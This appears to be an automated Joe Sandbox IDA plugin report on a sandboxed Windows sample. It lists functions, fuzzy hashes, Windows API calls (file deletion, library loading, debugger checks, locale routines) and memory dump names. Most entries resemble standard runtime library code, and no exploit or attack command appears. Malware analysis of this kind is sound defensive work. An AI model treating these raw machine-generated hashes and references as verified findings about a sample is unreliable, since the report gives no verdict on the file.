Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
Instruction ID: 075d174c29e8b9a285cc86435d9de6b6566309175037b2baedb39b092c8697f9
Opcode Fuzzy Hash: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
Instruction Fuzzy Hash: 5F31B021E1864286F711AF559C413BD2796AF90BA6F490135EA1E833DBCFBDE441AF20

Function 00007FF6399C52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C5209

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 56b9e94d63be7f45dbb1bba05753af811a8de41adb3b99ca54eef3c21e62fd0c
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: 0F114F21E1D68182EA619F519C0027EA3A6AF95B80F4C4531EA4D97BDFCF3CE840AF51

Function 00007FF6399D5664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D5687

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: a08a8f01a3e38d73171e4013f390a53a909629312db10b44d83c032028ec7086
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: 06216572A18A8186DB618F18D48077976A2EF94B94F684234E65DC77EEDF3DD800DF01

Function 00007FF6399BF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399BF730

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: cb41d71a703044fa55ed11e87dc92ecfc2a6ef28e0a2cd7a8ce8a7d49e575bbe
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 3C01A522B0874241EA04AF965940069A7AAEF95FE0F4C4671DE5C93BDFDE3CD5029B00

Function 00007FF6399B81A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

LoadLibraryExW.KERNELBASE(?,00007FF6399B5C06,?,00007FF6399B308E), ref: 00007FF6399B81C2

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
Instruction ID: da4a3461a8a6f2209283d6148d3f554e7ac5076aba1b11c21028dbea5fa3db68
Opcode Fuzzy Hash: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
Instruction Fuzzy Hash: 72D08C01F2864281EA44AB67AA8656962529F89BC0F4C8035EE5D43B8ADC3CC0800F00

Function 00007FF6399CC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6399BFFB0,?,?,?,00007FF6399C161A,?,?,?,?,?,00007FF6399C2E09), ref: 00007FF6399CC94A

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: 07109acda032d58db3665b32a49a7b6757112b3a2e0f4f536edd6dae4471efae
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: 99F0F811F1928785FF54AFA15D5127956825F8ABA2F0C4B30E92EC63CBEE2CA541AD20

Non-executed Functions

Function 00007FFDFF17173B Relevance: 39.0, APIs: 11, Strings: 11, Instructions: 491libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171923
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171982
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF1719E1
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171A40
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171A9F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171AFE
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171B5D
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171BBC
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171C1B
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171C7A
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF171CD9

Strings

GetUserDefaultLocaleName, xrefs: 00007FFDFF171B53
EnumSystemLocalesEx, xrefs: 00007FFDFF1719D7
AreFileApisANSI, xrefs: 00007FFDFF171919, 00007FFDFF171961
GetTimeFormatEx, xrefs: 00007FFDFF171AF4
LCMapStringEx, xrefs: 00007FFDFF171C11, 00007FFDFF171C59
LCIDToLocaleName, xrefs: 00007FFDFF1719C0, 00007FFDFF171A7E, 00007FFDFF171B3C, 00007FFDFF171B9B, 00007FFDFF171BFA, 00007FFDFF171C70, 00007FFDFF171CB8
CompareStringEx, xrefs: 00007FFDFF171978
LocaleNameToLCID, xrefs: 00007FFDFF171CCF
GetDateFormatEx, xrefs: 00007FFDFF171A36
IsValidLocaleName, xrefs: 00007FFDFF171BB2
GetLocaleInfoEx, xrefs: 00007FFDFF171A1F, 00007FFDFF171A95, 00007FFDFF171ADD

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressProc
String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
API String ID: 190572456-3252031757
Opcode ID: 4145d6d681e69173832bcfa656605b39e1e2ec865a9d3076a994667f8eadfcc1
Instruction ID: 728b7150b3bb77b90ef4a6b79995be3e3c8e4e5c986c7f9788bb727d4508b501
Opcode Fuzzy Hash: 4145d6d681e69173832bcfa656605b39e1e2ec865a9d3076a994667f8eadfcc1
Instruction Fuzzy Hash: C7124192F09B0642FF189729A87097963E2AF59784B485736DC3DCB3EDEF6CE5449200

Function 00007FFDFF160450 Relevance: 39.0, APIs: 11, Strings: 11, Instructions: 485libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF15F7E2), ref: 00007FFDFF160648

Strings

GetUserDefaultLocaleName, xrefs: 00007FFDFF1AAD9C
EnumSystemLocalesEx, xrefs: 00007FFDFF1AAB88
AreFileApisANSI, xrefs: 00007FFDFF1AAA7E, 00007FFDFF1AAAC2
GetTimeFormatEx, xrefs: 00007FFDFF1AAD17
LCMapStringEx, xrefs: 00007FFDFF1AAEA6, 00007FFDFF1AAEEA
LCIDToLocaleName, xrefs: 00007FFDFF160601, 00007FFDFF1AAB47, 00007FFDFF1AAC51, 00007FFDFF1AAD5B, 00007FFDFF1AADE0, 00007FFDFF1AAE65, 00007FFDFF1AAF2B
CompareStringEx, xrefs: 00007FFDFF1AAB03
LocaleNameToLCID, xrefs: 00007FFDFF16063E
GetDateFormatEx, xrefs: 00007FFDFF1AAC0D
IsValidLocaleName, xrefs: 00007FFDFF1AAE21
GetLocaleInfoEx, xrefs: 00007FFDFF1AABCC, 00007FFDFF1AAC92, 00007FFDFF1AACD6

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressProc
String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
API String ID: 190572456-3252031757
Opcode ID: 849ec979009c82abe593b97aec0054fa5a90c29fd59ab2faa9904e877cb3aaa7
Instruction ID: aae4c797524ba71f3e01fd03999783b7a0fbf4b68d949aa132fd521adc50cf9a
Opcode Fuzzy Hash: 849ec979009c82abe593b97aec0054fa5a90c29fd59ab2faa9904e877cb3aaa7
Instruction Fuzzy Hash: F8123E92F09B0682FF189719987097823E2AF59784B48573ADC3DCB3EDEF6CE5459200

Function 00007FFDFF15F890 Relevance: 13.8, APIs: 9, Instructions: 269COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF15F8D4
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF15F8E2
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF15F8F6
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF15F910

Part of subcall function 00007FFDFF1CCA50: IsProcessorFeaturePresent.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1 ref: 00007FFDFF1CCA8F

FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF15F923
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF15F951
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF15F977
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF15FB17

Part of subcall function 00007FFDFF162070: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFF15F368,?,?,?), ref: 00007FFDFF162085

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast$FeatureFreeHeapPresentProcessor
String ID:
API String ID: 4194406788-0
Opcode ID: 0b72b8b24379cf3aba06070db9776a7f2e5256b2bc6a3ecfd59abc98a38d98a5
Instruction ID: 869c54ffc66e41d68bd7c56efc42576ec4092052aba419bc48d2e55d909bdef2
Opcode Fuzzy Hash: 0b72b8b24379cf3aba06070db9776a7f2e5256b2bc6a3ecfd59abc98a38d98a5
Instruction Fuzzy Hash: 80C15923F09A428AEB248F64D464B7827A1AB44BA8F084739EE7D577D9DF38E545C300

Function 00007FF6399B79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7A1B
RemoveDirectoryW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7A9E
DeleteFileW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7ABD
FindNextFileW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7ACB
FindClose.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7ADC
RemoveDirectoryW.KERNEL32(?,00007FF6399B7EF9,00007FF6399B39E6), ref: 00007FF6399B7AE5

Strings

%s\*, xrefs: 00007FF6399B79E2

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: 9b3062bb9eced70b9f5a44a8f542fc99120c9f293cc927ccb8e8015a742684cf
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: 3D417321A0C54395EA609F28E8946B96372FF94754F480632D59DC2BDEDF3CE64ADF00

Function 00007FFDFF169349 Relevance: 10.8, APIs: 7, Instructions: 293COMMON

Download Yara Rule

APIs

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF16922B
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF16923E
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF16926C
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF169292
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692A9
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692B7
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692C2

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 0b10746108f9c867f2050e6f35d699da49a0c84ddc44cd7e880b2d0c7f7e3323
Instruction ID: 7900afb2f639a75e8f9daa1b7f37edfc33a2bc73ad337e5f08d4ea464f9a8134
Opcode Fuzzy Hash: 0b10746108f9c867f2050e6f35d699da49a0c84ddc44cd7e880b2d0c7f7e3323
Instruction Fuzzy Hash: EAC19D23F0965686FF158B65D560AB823A0BF54B98F405379DE3E876DEEF2DE9018200

Function 00007FF6399BC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6399BC468
RtlCaptureContext.KERNEL32 ref: 00007FF6399BC495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6399BC4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF6399BC4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF6399BC544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6399BC561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6399BC56C

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: 88cc63fa2d3d78d5702b9939fa759bd5f20276f3867e74f08a6b3a9732b2e0c4
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: A7314172609B8286EB609F64E8803ED7366FB45744F08403ADB4D87B99EF3CD548DB10

Function 00007FF6399C9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6399C999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6399C99B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6399C99F0
IsDebuggerPresent.KERNEL32 ref: 00007FF6399C9A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6399C9A33
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6399C9A3E

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: 6c89e3529143237bf87c122650a5b115976cedba898c3b9db555cf104b33408d
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: AF314236618F8286DB60CF25E8802AE73A5FB89754F580135EA9D87B9ADF3CD545CF00

Function 00007FFDFF1CB0AC Relevance: 9.1, APIs: 6, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFDFF1CB11E
RtlLookupFunctionEntry.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFDFF1CB136
RtlVirtualUnwind.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFDFF1CB171
IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00007FFDFF1CB1AE
SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF1CB1B8
UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF1CB1C3

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 3baf917f416f7064cf3d0989f29636da34f546af8597ff9f9722e96ef9ae733c
Instruction ID: 12c031d826a8a6a1089df860b3e65f154ced5ed8a93226229c4a51260b046b7e
Opcode Fuzzy Hash: 3baf917f416f7064cf3d0989f29636da34f546af8597ff9f9722e96ef9ae733c
Instruction Fuzzy Hash: 25314F36B08B8296DB60CF25E8506A973A4FB88B48F540236DBAD87B99DF38D544C700

Function 00007FFDFF1C9D94 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,00000002,00007FFDFF1CA14A), ref: 00007FFDFF1C9DF8
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,00000002,00007FFDFF1CA14A), ref: 00007FFDFF1C9E6D
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,00000002,00007FFDFF1CA14A), ref: 00007FFDFF1C9E86

Strings

ACP, xrefs: 00007FFDFF1C9DBD
OCP, xrefs: 00007FFDFF1C9DD1

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

